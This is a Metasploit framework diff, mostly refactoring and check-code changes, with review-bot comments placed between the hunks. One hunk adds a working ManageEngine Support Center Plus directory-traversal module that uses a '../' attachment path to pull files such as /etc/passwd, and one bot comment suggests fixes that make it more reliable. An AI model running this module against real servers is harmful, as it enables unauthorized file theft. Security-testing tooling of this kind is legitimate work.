diff --git a/.travis.yml b/.travis.yml index 6e4c13c878..6c815d2340 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,9 +1,11 @@ language: ruby +env: MSF_SPOTCHECK_RECENT=1 before_install: - rake --version - sudo apt-get update -qq - sudo apt-get install -qq libpcap-dev before_script: + - ./tools/msftidy.rb - cp config/database.yml.travis config/database.yml - bundle exec rake --version - bundle exec rake db:create diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 7b6c6d713e..e40d56439d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb 
@@ -303,52 +303,20 @@ class Meterpreter < Rex::Post::Meterpreter::Client safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_") self.info = safe_info - # Enumerate network interfaces to detect IP - ifaces = self.net.config.get_interfaces().flatten rescue [] - routes = self.net.config.get_routes().flatten rescue [] - shost = self.session_host + hobj = nil - # Try to match our visible IP to a real interface - # TODO: Deal with IPv6 addresses - found = !!(ifaces.find {|i| i.addrs.find {|a| a == shost } }) - nhost = nil - hobj = nil - - if Rex::Socket.is_ipv4?(shost) and not found - - # Try to find an interface with a default route - default_routes = routes.select{ |r| r.subnet == "0.0.0.0" || r.subnet == "::" } - default_routes.each do |r| - ifaces.each do |i| - bits = Rex::Socket.net2bitmask( i.netmask ) rescue 32 - rang = Rex::Socket::RangeWalker.new( "#{i.ip}/#{bits}" ) rescue nil - if rang and rang.include?( r.gateway ) - nhost = i.ip - break - end - end - break if nhost - end - - # Find the first non-loopback address - if not nhost - iface = ifaces.select{|i| i.ip != "127.0.0.1" and i.ip != "::1" } - if iface.length > 0 - nhost = iface.first.ip - end - end - end + nhost = find_internet_connected_address + original_session_host = self.session_host # If we found a better IP address for this session, change it up # only handle cases where the DB is not connected here - if not (framework.db and framework.db.active) + if !(framework.db && framework.db.active) self.session_host = nhost end - # The rest of this requires a database, so bail if it's not # there - return if not (framework.db and framework.db.active) + return if !(framework.db && framework.db.active) ::ActiveRecord::Base.connection_pool.with_connection { wspace = framework.db.find_workspace(workspace) 
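Review bot: `self.session_host = nhost` inside the `if !(framework.db && framework.db.active)` branch still assigns whatever `find_internet_connected_address` returns, and that helper yields nil whenever the visible address already belongs to a local interface, so a DB-less session can have its host cleared; guard it with `self.session_host = nhost if nhost`. The removed code only ran the interface/route search under `Rex::Socket.is_ipv4?(shost)`, a condition the new helper no longer checks, so IPv6 session hosts now go through the same matching logic — worth confirming that is intended. The two identical `!(framework.db && framework.db.active)` tests could be hoisted into one local, e.g. `db_active = framework.db && framework.db.active`. The enclosing method begins and ends outside this hunk.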
@@ -384,18 +352,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client if nhost framework.db.report_note({ :type => "host.nat.server", - :host => shost, + :host => original_session_host, :workspace => wspace, :data => { :info => "This device is acting as a NAT gateway for #{nhost}", :client => nhost }, :update => :unique_data }) - framework.db.report_host(:host => shost, :purpose => 'firewall' ) + framework.db.report_host(:host => original_session_host, :purpose => 'firewall' ) framework.db.report_note({ :type => "host.nat.client", :host => nhost, :workspace => wspace, - :data => { :info => "This device is traversing NAT gateway #{shost}", :server => shost }, + :data => { :info => "This device is traversing NAT gateway #{original_session_host}", :server => original_session_host }, :update => :unique_data }) framework.db.report_host(:host => nhost, :purpose => 'client' ) 
@@ -470,6 +438,60 @@ protected attr_accessor :rstream # :nodoc: + # Rummage through this host's routes and interfaces looking for an + # address that it uses to talk to the internet. + # + # @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_interfaces + # @see Rex::Post::Meterpreter::Extensions::Stdapi::Net::Config#get_routes + # @return [String] The address from which this host reaches the + # internet, as ASCII. e.g.: "192.168.100.156" + def find_internet_connected_address + + ifaces = self.net.config.get_interfaces().flatten rescue [] + routes = self.net.config.get_routes().flatten rescue [] + + # Try to match our visible IP to a real interface + found = !!(ifaces.find { |i| i.addrs.find { |a| a == session_host } }) + nhost = nil + + # If the host has no address that matches what we see, then one of + # us is behind NAT so we have to look harder. + if !found + # Grab all routes to the internet + default_routes = routes.select { |r| r.subnet == "0.0.0.0" || r.subnet == "::" } + + default_routes.each do |route| + # Now try to find an interface whose network includes this + # Route's gateway, which means it's the one the host uses to get + # to the interweb. + ifaces.each do |i| + # Try all the addresses this interface has configured + addr_and_mask = i.addrs.zip(i.netmasks).find do |addr, netmask| + bits = Rex::Socket.net2bitmask( netmask ) + range = Rex::Socket::RangeWalker.new("#{addr}/#{bits}") rescue nil + + !!(range && range.valid? && range.include?(route.gateway)) + end + if addr_and_mask + nhost = addr_and_mask[0] + break + end + end + break if nhost + end + + if !nhost + # Find the first non-loopback address + non_loopback = ifaces.find { |i| i.ip != "127.0.0.1" && i.ip != "::1" } + if non_loopback + nhost = non_loopback.ip + end + end + end + + nhost + end + end end diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index e6cce966f8..cab869d366 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb 
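Review bot: `bits = Rex::Socket.net2bitmask( netmask )` inside the `find` block lost the `rescue 32` fallback the removed code carried, so a single malformed netmask on any interface now raises out of `find_internet_connected_address` entirely instead of skipping that address; the `rescue []` guards only protect the two `get_*` calls above. Restoring the fallback to match the `rescue nil` on the next line, `bits = Rex::Socket.net2bitmask(netmask) rescue 32`, keeps the best-effort behaviour. The YARD `@return [String]` is also inaccurate: `nhost` stays nil whenever `found` is true, so it should read `@return [String, nil] ... nil when the visible session address already belongs to a local interface`. `i.addrs.zip(i.netmasks)` presumably relies on the two arrays being index-aligned; a one-line comment stating that assumption would help the next reader.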
@@ -2,6 +2,28 @@ module Msf::Post::Common + def rhost + case session.type + when 'meterpreter' + session.sock.peerhost + when 'shell' + session.session_host + end + end + + def rport + case session.type + when 'meterpreter' + session.sock.peerport + when 'shell' + session.session_port + end + end + + def peer + "#{rhost}:#{rport}" + end + # # Checks if the remote system has a process with ID +pid+ # diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index 1d148f7028..73f3b781b2 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -98,14 +98,13 @@ module Msf::Post::File return !!(stat) else if session.platform =~ /win/ - f = cmd_exec("cmd.exe /C IF exist \"#{path}\" ( echo true )") + # XXX else f = session.shell_command_token("test -e '#{path}' && echo true") + return false if f.nil? or f.empty? + return false unless f =~ /true/ + return true end - - return false if f.nil? or f.empty? - return false unless f =~ /true/ - return true end end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb index d006221b30..70b1ef4d7e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb @@ -49,10 +49,9 @@ class Config get_interfaces().each(&block) end - # # Returns an array of network interfaces with each element. # - # being an Interface + # @return [Array] def get_interfaces request = Packet.create_request('stdapi_net_config_get_interfaces') ifaces = [] diff --git a/modules/auxiliary/scanner/h323/h323_version.rb b/modules/auxiliary/scanner/h323/h323_version.rb index 3fd8b5392e..2f06559fd6 100644 --- a/modules/auxiliary/scanner/h323/h323_version.rb +++ b/modules/auxiliary/scanner/h323/h323_version.rb 
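Review bot: `rhost` and `rport` return nil for any `session.type` other than 'meterpreter' or 'shell', and `peer` then silently produces the string ":"; either an `else` branch (for instance falling back to `session.session_host` / `session.session_port`) or an explicit `@return [String, nil]` note should make that contract visible. None of the three new methods is documented, while the rest of the file uses `# Checks if ...` comment blocks; a one-liner each such as `# Address of the remote end of this session, as seen from our side` would match. If a module also includes another mixin that defines `peer` (an HTTP client mixin, for example), which definition wins depends on include order — worth confirming before relying on this one.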
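Review bot: Replacing the Windows branch with `# XXX` leaves `if session.platform =~ /win/` with an empty body, so for Windows command-shell sessions the method now falls off the end and returns nil without probing the path at all — a silent regression from the previous `cmd.exe /C IF exist` check rather than a visible TODO. If the Windows probe is being dropped deliberately, say so in code: `return false # XXX: no file-existence probe for Windows shell sessions yet`, so callers get a defined value and the gap is greppable. On the other branch, `test -e '#{path}'` still interpolates `path` straight into a quoted shell string, so a path containing a single quote breaks the quoting; `Shellwords.escape(path)` or at least a comment stating that `path` must be trusted would help. The enclosing method starts outside the hunk.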
@@ -51,7 +51,17 @@ class Metasploit3 < Msf::Auxiliary conf_guid = Rex::Text.rand_text(16) call_guid = Rex::Text.rand_text(16) - pkt_setup = h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + pkt_setup = h323_setup_call({ + :caller_name => caller_name, + :h323_id => h323_id, + :vendor_id => vendor_id, + :callee_host => callee_host, + :callee_port => callee_port, + :caller_host => caller_host, + :caller_port => caller_port, + :conf_guid => conf_guid, + :call_guid => call_guid + }) res = sock.put(pkt_setup) rescue nil if not res @@ -88,7 +98,10 @@ class Metasploit3 < Msf::Auxiliary end # Make sure the call was shut down cleanly - pkt_release = h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + pkt_release = h323_release_call({ + :caller_name => caller_name, + :call_guid => call_guid + }) sock.put(pkt_release) rescue nil # End timeout block @@ -352,7 +365,16 @@ class Metasploit3 < Msf::Auxiliary # # This is ugly. Doing it properly requires a PER capable ASN.1 encoder, which is overkill for this task # - def create_user_info(h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def create_user_info(opts = {}) + h323_id = opts[:h323_id] + vendor_id = opts[:vendor_id] + callee_host = opts[:callee_host] + callee_port = opts[:callee_port] + caller_host = opts[:caller_host] + caller_port = opts[:caller_port] + conf_guid = opts[:conf_guid] + call_guid = opts[:call_guid] + buff = "\x05" # Protocol descriminator: X.208/X.209 coded user information buff << "\x20\xa8\x06\x00\x08\x91\x4a\x00\x06\x01\x40\x02" 
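Review bot: `create_user_info(opts = {})` now takes nine values through an options hash, but neither the signature nor the comment above it says which keys are expected, and a missing key silently becomes nil that is interpolated into `buff`. A YARD block above the `def` — `@param opts [Hash]` followed by one `@option opts [...] :h323_id` line per key, listing each accepted key with its type — would document the contract where the old positional signature used to; the same applies to `h323_release_call` and `h323_setup_call` in the later hunks. The body of `create_user_info` continues outside the hunk.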
@@ -539,7 +561,10 @@ class Metasploit3 < Msf::Auxiliary "\x02\x80\x01\x00" end - def h323_release_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def h323_release_call(opts = {}) + caller_name = opts[:caller_name] + call_guid = opts[:call_guid] + encap_tpkt(3, encap_q225_release( create_ie_display(caller_name) + @@ -550,13 +575,32 @@ class Metasploit3 < Msf::Auxiliary ) end - def h323_setup_call(caller_name, h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid) + def h323_setup_call(opts = {}) + caller_name = opts[:caller_name] + h323_id = opts[:h323_id] + vendor_id = opts[:vendor_id] + callee_host = opts[:callee_host] + callee_port = opts[:callee_port] + caller_host = opts[:caller_host] + caller_port = opts[:caller_port] + conf_guid = opts[:conf_guid] + call_guid = opts[:call_guid] + encap_tpkt(3, encap_q225_setup( create_ie_bearer_capability() + create_ie_display(caller_name) + create_ie_user_user( - create_user_info( h323_id, vendor_id, callee_host, callee_port, caller_host, caller_port, conf_guid, call_guid ) + create_user_info({ + :h323_id => h323_id, + :vendor_id => vendor_id, + :callee_host => callee_host, + :callee_port => callee_port, + :caller_host => caller_host, + :caller_port => caller_port, + :conf_guid => conf_guid, + :call_guid => call_guid + }) ) ) ) diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb new file mode 100644 index 0000000000..4dd71493e3 --- /dev/null +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb 
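Review bot: `h323_setup_call` unpacks all nine keys from `opts` only to rebuild an identical hash for `create_user_info`, so the eight-line literal can be replaced by `create_user_info(opts)` — `create_user_info` reads only the keys it needs, so the extra `:caller_name` entry is harmless. That also removes the risk of the two key lists drifting apart when a field is added. The method's closing `end` lies outside the hunk.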
@@ -0,0 +1,160 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Support Center Plus Directory Traversal", + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in ManageEngine + Support Center Plus build 7916 and lower. The module will create a support ticket + as a normal user, attaching a link to a file on the server. By requesting our + own attachment, it's possible to retrieve any file on the filesystem with the same + privileges as Support Center Plus is running. On Windows this is always with SYSTEM + privileges. + }, + 'License' => MSF_LICENSE, + 'Author' => 'xistence ', # Discovery, Metasploit module + 'References' => + [ + ['EDB', '31262'], + ['OSVDB', '102656'], + ['BID', '65199'], + ['URL', 'http://packetstormsecurity.com/files/124975/ManageEngine-Support-Center-Plus-7916-Directory-Traversal.html'] + ], + 'DisclosureDate' => "Jan 28 2014" + )) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'The base path to the Support Center Plus installation', '/']), + OptString.new('USER', [true, 'The Support Center Plus user', 'guest']), + OptString.new('PASS', [true, 'The Support Center Plus password', 'guest']), + OptString.new('FILE', [true, 'The Support Center Plus password', '/etc/passwd']) + ], self.class) + end + + def run_host(ip) + uri = target_uri.path + peer = "#{ip}:#{rport}" + + vprint_status("#{peer} - Retrieving cookie") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "") + }) + + if res and res.code == 200 + session = res.get_cookies + else + vprint_error("#{peer} - Server returned #{res.code.to_s}") + end + + 
vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, "j_security_check"), + 'cookie' => session, + 'vars_post' => + { + 'j_username' => datastore['USER'], + 'j_password' => datastore['PASS'], + 'logonDomainName' => 'undefined', + 'sso_status' => 'false', + 'loginButton' => 'Login' + } + }) + + if res and res.code == 302 + vprint_status("#{peer} - Login succesful") + else + vprint_error("#{peer} - Login was not succesful!") + return + end + + randomname = Rex::Text.rand_text_alphanumeric(10) + vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, "WorkOrder.do"), + 'cookie' => session, + 'vars_post' => + { + 'reqTemplate' => '', + 'prodId' => '0', + 'priority' => '2', + 'reqID' => '2', + 'usertypename' => 'Requester', + 'reqName' => 'Guest', + 'category' => '0', + 'item' => '0', + 'subCategory' => '0', + 'title' => randomname, + 'description' => randomname, + 'MOD_IND' => 'WorkOrder', + 'FORMNAME' => 'WorkOrderForm', + 'attach' => "/../../../../../../../../../../../..#{datastore['FILE']}", + 'attPath' => '', + 'component' => 'Request', + 'attSize' => Rex::Text.rand_text_numeric(8), + 'attachments' => randomname, + 'autoCCList' => '', + 'addWO' => 'addWO' + } + }) + + if res and res.code == 200 + vprint_status("#{peer} - Ticket created") + if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) + fileid = $1 + vprint_status("#{peer} - File ID is [ #{fileid} ]") + fileauthkey = $2 + vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + else + vprint_error("#{peer} - File ID and AuthKey not found!") + end + else + vprint_error("#{peer} - Ticket not created due to error!") + return + end + + vprint_status("#{peer} - Requesting file [ 
#{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), + 'vars_get' => + { + 'module' => 'Request', + 'ID' => fileid, + 'authKey' => fileauthkey + } + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. Print the status code for debugging purposes. + if res and res.code == 200 + data = res.body + p = store_loot( + 'manageengine.supportcenterplus', + 'application/octet-stream', + ip, + data, + datastore['FILE'] + ) + print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + else + vprint_error("#{peer} - Server returned #{res.code.to_s}") + end + end +end + diff --git a/modules/auxiliary/scanner/printer/printer_download_file.rb b/modules/auxiliary/scanner/printer/printer_download_file.rb index 684ccb39a0..48838f6b1f 100644 --- a/modules/auxiliary/scanner/printer/printer_download_file.rb +++ b/modules/auxiliary/scanner/printer/printer_download_file.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_env_vars.rb b/modules/auxiliary/scanner/printer/printer_env_vars.rb index 331a8b6658..bad052ed58 100644 --- a/modules/auxiliary/scanner/printer/printer_env_vars.rb +++ b/modules/auxiliary/scanner/printer/printer_env_vars.rb 
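Review bot: In `run_host`, the cookie step's `else` branch calls `res.code.to_s` when `res` is nil (a connection failure is exactly what that branch exists to report) and then continues with `session` unset, so the login POST is sent with `'cookie' => nil`; the same `res.code` dereference on a possibly nil `res` recurs in the final download step. The branch should bail out and read `res.code` only when a response exists, as below. The ticket step has the same shape: when the `FileDownload.jsp` regex does not match it logs an error but falls through to the download request with `fileid` and `fileauthkey` nil, so add `return` after `vprint_error("#{peer} - File ID and AuthKey not found!")`. Separately, the `FILE` option's description reads `'The Support Center Plus password'`, a copy-paste from `PASS`; it should describe the file to retrieve.
```ruby
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "")
    })

    unless res && res.code == 200
      vprint_error("#{peer} - Server returned #{res ? res.code : 'no response'} while retrieving cookie")
      return
    end
    session = res.get_cookies
    # … unchanged: login POST, ticket creation, file download …
```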
@@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni" # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_list_dir.rb b/modules/auxiliary/scanner/printer/printer_list_dir.rb index 6069bdf973..7737ddb2bb 100644 --- a/modules/auxiliary/scanner/printer/printer_list_dir.rb +++ b/modules/auxiliary/scanner/printer/printer_list_dir.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_list_volumes.rb b/modules/auxiliary/scanner/printer/printer_list_volumes.rb index 982c4c8295..39298917ce 100644 --- a/modules/auxiliary/scanner/printer/printer_list_volumes.rb +++ b/modules/auxiliary/scanner/printer/printer_list_volumes.rb 
@@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_ready_message.rb b/modules/auxiliary/scanner/printer/printer_ready_message.rb index 0a5fce4670..bddc1646aa 100644 --- a/modules/auxiliary/scanner/printer/printer_ready_message.rb +++ b/modules/auxiliary/scanner/printer/printer_ready_message.rb @@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary a set of printers using the Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/auxiliary/scanner/printer/printer_version_info.rb b/modules/auxiliary/scanner/printer/printer_version_info.rb index a6d0dcbf90..f1018fdf88 100644 --- a/modules/auxiliary/scanner/printer/printer_version_info.rb +++ b/modules/auxiliary/scanner/printer/printer_version_info.rb 
@@ -20,10 +20,11 @@ class Metasploit4 < Msf::Auxiliary Printer Job Language (PJL) protocol. }, "Author" => [ - "wvu", # This implementation + "wvu", # Rex::Proto::PJL and modules "sinn3r", # RSpec tests - "MC", # Independent implementation - "Myo Soe" # Independent implementation + "MC", # Independent mixin and modules + "Myo Soe", # Independent modules + "Matteo Cantoni " # Independent modules ], "References" => [ ["URL", "https://en.wikipedia.org/wiki/Printer_Job_Language"] diff --git a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb index 2c6954b241..ea1e397fbf 100644 --- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb @@ -106,15 +106,15 @@ class Metasploit3 < Msf::Exploit::Remote if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 - status = CheckCode::Vulnerable + status = CheckCode::Appears end else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 2a22ac30e4..b7f26527e2 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /IRIX/) - print_status("Response: #{resp.strip}") + vprint_status("Response: #{resp.strip}") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/ftp/proftp_sreplace.rb b/modules/exploits/linux/ftp/proftp_sreplace.rb index 866f6f0ec1..b8fa872f5c 100644 --- a/modules/exploits/linux/ftp/proftp_sreplace.rb +++ b/modules/exploits/linux/ftp/proftp_sreplace.rb 
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = connect # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe @@ -129,16 +129,16 @@ class Metasploit3 < Msf::Exploit::Remote relv = rel.slice!(0,1) case relv when '2' - status = CheckCode::Vulnerable + status = CheckCode::Appears when '3' # 1.3.x before 1.3.1 is vulnerable - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel.to_i > 0 status = CheckCode::Safe else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end end diff --git a/modules/exploits/linux/ftp/proftp_telnet_iac.rb b/modules/exploits/linux/ftp/proftp_telnet_iac.rb index b18b7cc67e..5d69d3b95e 100644 --- a/modules/exploits/linux/ftp/proftp_telnet_iac.rb +++ b/modules/exploits/linux/ftp/proftp_telnet_iac.rb @@ -274,7 +274,7 @@ class Metasploit3 < Msf::Exploit::Remote banner = sock.get_once || '' # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe if banner =~ /ProFTPD (1\.3\.[23][^ ])/i @@ -286,15 +286,15 @@ class Metasploit3 < Msf::Exploit::Remote if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 - status = CheckCode::Vulnerable + status = CheckCode::Appears end else - status = CheckCode::Vulnerable + status = CheckCode::Appears end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) - status = CheckCode::Vulnerable + status = CheckCode::Appears if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index d056df5613..ef2f097f2e 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb 
@@ -92,23 +92,23 @@ class Metasploit3 < Msf::Exploit::Remote vers = ut_version if (not vers) - print_status("Could not detect Unreal Tournament Server") - return + vprint_status("Could not detect Unreal Tournament Server") + return Exploit::CheckCode::Unknown end print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) - print_status("This system appears to be exploitable") + vprint_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end if (vers =~ /^(2...)$/) - print_status("This system appears to be running UT2003") + vprint_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end - print_status("This system appears to be patched") + vprint_status("This system appears to be patched") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index 3fa37da1a3..d6f0676960 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Astium") + vprint_status("#{peer} - Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index d636f73a92..4584c79a40 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb 
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi({ 'uri' => '/comm.asp' }) if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/hp_system_management.rb b/modules/exploits/linux/http/hp_system_management.rb index e6a4f2c311..1029c220a0 100644 --- a/modules/exploits/linux/http/hp_system_management.rb +++ b/modules/exploits/linux/http/hp_system_management.rb @@ -71,9 +71,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/cpqlogin.htm" }) - if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ + if res.nil? + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown + elsif res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/ version = $1 - return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1" + return Exploit::CheckCode::Appears if version <= "7.1.1.1" end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index 7940a3ddce..26d1c3c07b 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -57,11 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/HNAP1/' }) rescue ::Rex::ConnectionError - return Exploit::CheckCode::Safe + vprint_error("A connection error has occured") + return Exploit::CheckCode::Unknown end if res and res.code == 200 and res.body =~ /WRT110<\/ModelName>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe 
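Review bot: `return Exploit::CheckCode::Appears if version <= "7.1.1.1"` orders version strings lexicographically, so a version whose first component has more digits sorts on the wrong side of the threshold — a constructed `"10.0.0.0"` is `<= "7.1.1.1"` as a string and would be reported as Appears. `Gem::Version.new(version) <= Gem::Version.new("7.1.1.1")` compares components numerically and is in the standard library; since `$1` comes from a `(.*)` capture, the value may need a sanity check before it is parsed. The same string ordering is used in mutiny_frontend_upload's `version >= "5" and version <= "5.0-1.07"` in a later hunk and deserves the same treatment. The new `res.nil?` branch is a good addition; `res.body` on the `elsif` line is still assumed non-nil, which is presumably guaranteed by the HTTP client — worth confirming.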
